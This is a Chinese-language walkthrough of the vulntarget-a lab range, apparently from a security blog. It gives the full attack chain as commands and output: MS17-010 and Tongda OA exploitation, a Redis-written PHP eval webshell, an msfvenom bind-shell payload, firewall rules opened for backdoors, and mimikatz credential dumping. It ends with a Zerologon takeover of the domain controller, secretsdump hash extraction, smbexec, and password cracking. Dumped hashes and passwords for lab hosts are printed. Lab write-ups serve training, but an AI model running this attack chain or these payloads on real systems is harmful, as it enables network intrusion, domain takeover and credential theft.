✎ 閱讀須知

烏鴉安全的技術文章僅供參考，此文所提供的資訊隻為網絡安全人員對自己所負責的網站、伺服器等（包括但不限于）進行檢測或維護參考，未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的資訊而造成的直接或間接後果和損失，均由使用者本人負責。

烏鴉安全擁有對此文章的修改、删除和解釋權限，如轉載或傳播此文章，需保證文章的完整性，未經允許，禁止轉載！

本文所提供的工具僅用于學習，禁止用于其他，請在24小時内删除工具檔案！！！

本文作者：夏天本文已獲得作者授權

vuntarget免責聲明

vulntarget靶場系列僅供安全專業人員練習滲透測試技術，此靶場所提供的資訊隻為網絡安全人員對自己所負責的網站、伺服器等（包括但不限于）進行檢測或維護參考，未經授權請勿利用靶場中的技術資料對任何計算機系統進行入侵操作。利用此靶場所提供的資訊而造成的直接或間接後果和損失，均由使用者本人負責。

vulntarget靶場系列擁有對此靶場系列的的修改、删除和解釋權限，未經授權，不得用于其他。

vulntarget位址：

https://github.com/crow821/vulntarget

歡迎多多star🌟

vulntarget搭建系列

vulntarget漏洞靶場系列(一)

vulntarget漏洞靶場系列（二）— vulntarget-b

vulntarget漏洞靶場系列（三）— vulntarget-c

1. 拓撲圖

靶場下載下傳位址

連結: https://pan.baidu.com/s/195iUmvbaKOhtn2S_O-F6TA 提取碼: jnkq

複制

入口

192.168.0.4

kali

192.168.0.35

2. 第一層

2.1 端口掃描

nmap

掃描一下開了掃描端口

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC 192.168.0.4 -p- -T4 -v
Host is up (0.00083s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
|_http-favicon: Unknown favicon MD5: 1205AF91D6B1638C23DE1132AE0C7E0B
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-26T09:56:17+08:00
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:24:f0:bb (VMware)
| Names:
|   WIN7-PC<00>          Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WIN7-PC<20>          Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-01-26T01:56:17
|_  start_date: 2022-01-26T01:49:34

複制

開了

SMB

服務可以嘗試

ms17-010

掃描

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap --script=vuln 192.168.0.4 -p 445,135,139 -T4 -v
Host is up (0.0011s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

複制

nmap

掃到了

ms17-010

漏洞，還開了

端口

2.2 通達OAgetshell

http://192.168.0.4/rA4WmWb.php
密碼:x

複制

蟻劍連接配接直接

system

權限

2.3 MS17-010漏洞

掃描存在

擷取密碼

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
win7      win7-PC  f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
WIN7-PC$  WORKGROUP  (null)
win7      win7-PC    admin

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
win7      win7-PC  admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
win7      win7-PC    admin
win7-pc$  WORKGROUP  (null)

複制

發現内網網段

10.0.20.98

自動遷移程序，添加路由

meterpreter > run post/windows/manage/migrate 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN7-PC
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3728
[+] Successfully migrated into process 3728


meterpreter > run post/multi/manage/autoroute 

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.

複制

3. 橫向第二台機器

掃描

10.0.20.0/24

網段

use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,8081,3389,445,143,6379
set rhosts 10.0.20.0/24
set threads 20
run

複制

已知

是我們拿下的

win7

開了

和

開啟

msf

的

socks5

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

複制

掃一下目錄

python3 dirsearch.py -u "http://10.0.20.99/" --proxy=socks5://localhost:1080

複制

得到的

web

C:\phpStudy\PHPTutorial\WWW\phpinfo.php

沒什麼可看的測試一下

，發現未授權

windows

，不出網，就寫

webshell

吧

┌──(kali㉿kali)-[~]
└─$ proxychains4 redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename xt.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
OK

複制

蟻劍連接配接

image.png

quser

：發現win2016使用者線上

ipconifg /all

：域名

vulntarget.com

另外一個内網

IP

10.0.10.111

tasklist

檢視程序，清除軟，存在

Windows Defender

正向上線

msf

生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8091 -f exe > 8091_bind.exe

複制

監聽配置

msf6 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     8091             yes       The listen port
   RHOST     10.0.20.99       no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.0.20.99:8091

複制

後門運作，但遲遲沒有上線，可能就是防火牆開了

添加防火牆入站規則

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

複制

重新運作運作，恭喜上線成功

加載

kiwi

随機切換一個程序

檢視

HTLM

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > run post/windows/manage/migrate 

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2016
[*] Current server process: 8091_bind.exe (676)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 1764
[+] Successfully migrated into process 1764
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain      NTLM                              SHA1                                      DPAPI
--------  ------      ----                              ----                                      -----
WIN2016$  VULNTARGET  aabc352125765ee443568d0cdf27d62a  0aeb385e9aa49fa7e0be911d3b17da00f2aa7acd
WIN2016$  VULNTARGET  e0cd419213811fd910ca6c3c42d764e7  cd721f807e68ce07a4d0fe80b9356e93986d5ef1
win2016   VULNTARGET  dfc8d2bfa540a0a6e2248a82322e654e  cfa10f59337120a5ea6882b11c1c9f451f5f4ea6  27bd7cc4802079a6e008ed2d917c4323

wdigest credentials
===================

Username  Domain      Password
--------  ------      --------
(null)    (null)      (null)
WIN2016$  VULNTARGET  (null)
win2016   VULNTARGET  (null)

kerberos credentials
====================

Username  Domain          Password
--------  ------          --------
(null)    (null)          (null)
WIN2016$  vulntarget.com  NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$  vulntarget.com  c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
                           27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
                          8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
                          91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
win2016   VULNTARGET.COM  (null)
win2016$  VULNTARGET.COM  (null)
win2016$  VULNTARGET.COM  c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
                           27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
                          8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
                          91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5


meterpreter >

複制

win2016

的密碼

Admin#123

檢視域控制器計算機名

net group "domain controllers" /domain
WIN2019

複制

檢視域管理者

net group "enterprise admins" /domain
administrator

複制

ping

域控制器主機名稱得到

IP

位址

10.0.10.110

添加路由

4. CVE-2020-1472提權到域控

因為隻是域普通使用者，直接上

漏洞

密碼置空，使用secretdump擷取域控上的hash

┌──(kali㉿kali)-[~/Desktop/CVE-2020-1472/EXP]
└─$ proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:49674  ...  OK
======================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

複制

得到

administrator

域管理者的

hash

┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 secretsdump.py  vulntarget.com/WIN2019\[email protected]  -just-dc  -no-pass                                                                                                                                     127 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:64e86893159e2f036ee7d9a7a8312dfa9e2ab3b1435dcad3d372cac3d3530b54
WIN2016$:aes128-cts-hmac-sha1-96:efe65cbd2f33250e1f5d0baad8fa8719
WIN2016$:des-cbc-md5:911657540e94079b
[*] Cleaning up...

複制

成功通路域控

┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]                                                                                                 1 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
win2019

C:\Windows\system32>

複制

破解

hash

密碼

Admin@666

秒出！！！！

─(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=./pass.txt ./winhash.txt --format=NT                                                                                                                                                                                 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Admin@666        (Administrator)     
1g 0:00:00:00 DONE (2022-01-26 01:58) 100.0g/s 508800p/s 508800c/s 508800C/s admin333..Admin99
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

複制

開啟

，防火牆放行

，連接配接

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

複制

準備上線

msf

還是開了防火牆先做規則

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

複制

【永久開源】vulntarget-a 打靶記錄1. 拓撲圖2. 第一層3. 橫向第二台機器4. CVE-2020-1472提權到域控